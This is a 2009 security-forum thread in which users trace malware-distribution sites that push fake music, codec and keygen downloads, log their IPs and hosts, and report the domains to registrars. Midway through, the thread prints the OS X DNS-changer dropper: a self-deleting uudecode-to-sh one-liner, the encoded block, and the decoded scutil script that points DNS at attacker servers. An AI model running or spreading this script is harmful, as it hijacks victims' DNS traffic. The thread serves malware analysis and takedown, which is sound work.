MarcusB - OS X DNS Changer Thread

[MarcusB]

domain name registrar has disabled...
music-megaupload.com
hot-exe-area.net
securerealy.com
Please help clean the interwebs!!! If you find a site that hosts malicious code, report the abuse to the registrar of the domain so they can DISABLE the site. This way the domain in question can't be used again for spreading malware!

http:/ /music-megaupload.com/2009/05/25/tupac-all-eyez-on-me-1996.html

music-megaupload.com
213.155.3.240 - 213.155.3.247
XeonN2
213.155.3.242

Clicking a download link for example...
http:/ /music-megaupload.com/wp-download.php?name=Tupac%20-%20All%20Eyez%20On%20Me%20(1996)&s=mumu&p=Music

redirects you to
http:/ /securerealy.com/download/5761384b73513d3d5da244ae20090701/Tupac.-.All.Eyez.On.Me.(1996).exe
if a Windows useragent or
http:/ /securerealy.com/download/5761384b73513d3d5da244ae20090701/Tupac.-.All.Eyez.On.Me.(1996).dmg
if a OSX user agent.


securerealy.com
213.163.66.128 - 213.163.66.255
INTERACTIVE3D
213.163.66.241

Abuse report sent to register PUBLICDOMAINREGISTRY on domain 'music-megaupload.com'
Abuse report sent to register Enom inc. on domain 'securerealy.com'


------------------------------------------------------------------
Here is another similar domain to 'music-megaupload.com'
http:/ /free-full.com/2009/2pac-all-eyez-on-me-rapidshare.html

free-full.com
213.155.3.128 - 213.155.3.253
XeonN2
213.155.3.240

Earlier in the day, clicking the download links I got redirected to
http:/ /hot-exe-area.net/2Pac.-.All.Eyez.On.Me.45026.exe
The file is not malicious at the time being.
Current download links redirect to Google searches.

hot-exe-area.net
64.20.32.0 - 64.20.63.255
Interserver, Inc
64.20.38.172

However doing a google search for 'hot-exe-area.net', I found two links that are indeed malicious
http:/ /hot-exe-area.net/streamviewer.40019.exe
http://www.virustotal.com/analisis/ff7ddc5e00889455558c3ed5bb341de35f6466f454431554424a644da1d69bc1-1246552458
http:/ /hot-exe-area.net/video.123456789.exe
http://www.virustotal.com/analisis/3a225464bfe52066ccb82eea39d738ce37e48d7dcd851579c11dfc1cf0ec399e-1246552566

Abuse report sent to register PUBLICDOMAINREGISTRY of domain 'hot-exe-area.net'

-------------------------------------------------------------

The OSX version of the malware will connect to
213.163.66.242
213.163.66.128 - 213.163.66.255
INTERACTIVE3D

It downloads a shell script

tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ook | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.mn | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end

The script will try to change the DNS servers to
85.255.112.114
85.255.112.87

[bobby]

Code: [Select]

M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`Decodes to:

Code: [Select]

#!/bin/sh
path="/Library/Internet Plug-Ins"

[MarcusB]

It does?

This is what I get when decoding...

#!/bin/sh
path="/Library/Internet Plug-Ins"

VX1="85.255.112.114"
VX2="85.255.112.87"

PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $VX1 $VX2
set State:/Network/Service/$PSID/DNS
quit
EOF

[MarcusB]

domain name registrar has disabled...
let-exe-2009.com
av-scan-cool.com
Please help clean the interwebs!!! If you find a site that hosts malicious code, report the abuse to the registrar of the domain so they can DISABLE the site. This way the domain in question can't be used again for spreading malware!


Followed in order...
http:/ /members.lycos.nl/kolbi44/
http:/ /speed-tube.net/tds/go.php?sid=3
http:/ /video-tube.cn/tds3/in.cgi?5

http:/ /hotxxxtubz.com/123/mac3/FFFFFF/57506e7336413d3dc340d7e120090615/TestCodec/BestPorn/
http:/ /selectaaron.com/download/57506e7336413d3dc340d7e120090615/TestCodec.dmg
http:/ /selectaaron.com/download/57506e7336413d3dc340d7e120090615/TestCodec.exe


These two sites...
http:/ /speed-tube.net/tds/go.php?sid=3
http:/ /video-tube.cn/tds3/in.cgi?5
also redirected me to these sites...

http:/ /av-scan-cool.com/?id=45095
http:/ /let-exe-2009.com/av-scanner.45095.exe


members.lycos.nl - 213.131.252.251
speed-tube.net - 70.84.196.26 - ThePlanet.com Internet Services, Inc.
video-tube.cn - 70.84.196.30 - ThePlanet.com Internet Services, Inc.
hotxxxtubz.com - 93.190.140.56 - WORLDSTREAM
selectaaron.com - 213.163.66.241 - INTERACTIVE3D
av-scan-cool.com - 216.240.143.8 - ATMLINK, INC.
let-exe-2009.com - 64.20.38.172 - Interserver, Inc


Abuse report sent to register PUBLICDOMAINREGISTRY on domain 'av-scan-cool.com'
Abuse report sent to register PUBLICDOMAINREGISTRY on domain 'let-exe-2009.com'
Abuse report sent to register Enom inc. on domain 'selectaaron.com'


Some other sites I have been redirected to by the first three links listed but have yet to check out...
http:/ /totalsecuritysite.com/hitin.php?land=30&affid=21700
http:/ /totalsecuritysite.com/scan.php?affid=21700
http:/ /softwaredownloadcodec.cn/tds3/in.cgi?3
http:/ /www.topadult10.com/search.php?aid=59426&q=adult+dating
http:/ /muvieportal2008.cn/tds3/in.cgi?3
http:/ /findergall.net/tds3/default.cgi

[djlheat]

i got a virus from this jerk i cant get rid of and dont know how to contact provider to complain he gave me a trojan
    * File MD5: 0x74441056E4BA6F3BE0B4B9CC36991960
    * File SHA-1: 0xA4DB80AB2E3F61715181CB97FB030B1238BBB1C1
    * Filesize: 108,530 bytes
    * Alias:
          o Trojan-GameThief.Win32.Magania.bjdx [Kaspersky Lab]
          o Mal/Frethog-B [Sophos]
          o Worm.Win32.Taterf [Ikarus]
          o Win-Trojan/OnlineGameHack.108530 [AhnLab]


this is his info:

Domain Name      : 35465543.com
PunnyCode        : 35465543.COM


Registrant:
  Organization   : huang
  Name           : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000

Administrative Contact:
  Name           : huang
  Organization   : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000
  Phone Number   : 0-139-139346566
  Fax            : 0-139-13934656
  Email          : fenfenaidajian@21cn.com

Technical Contact:
  Name           : huang
  Organization   : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000
  Phone Number   : 0-139-139346566
  Fax            : 0-139-13934656
  Email          : fenfenaidajian@21cn.com

Billing Contact:
  Name           : huang
  Organization   : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000
  Phone Number   : 0-139-139346566
  Fax            : 0-139-13934656
  Email          : fenfenaidajian@21cn.com

[MysteryFCM]

Reporting it to the hosting company is a waste of time as they're crimeware friendly.

With regards to the infection, please refer to the following if you still need help with this;

http://temerc.com/forums/viewtopic.php?f=12&t=18

[MarcusB]

Click on the download link
http:/ /yourcrackkey.com/mac-os-x-leopard-1054-for-amd-intel.html
213.182.197.8

Download links takes you to
http:/ /bigdron.com/download/4b71774f58773d3d463c9eb920090715/keygen-mac_os_x_leopard_10_5_4_for_amd_&_intel.dmg
91.214.45.73

Running the executable, it tries to download additional code from ip
91.214.45.74

[MarcusB]

http:/ /civilizxx.com/download/734d327771673d3d720ba09a20090715/AdobeFlashPlayer.dmg
91.214.45.73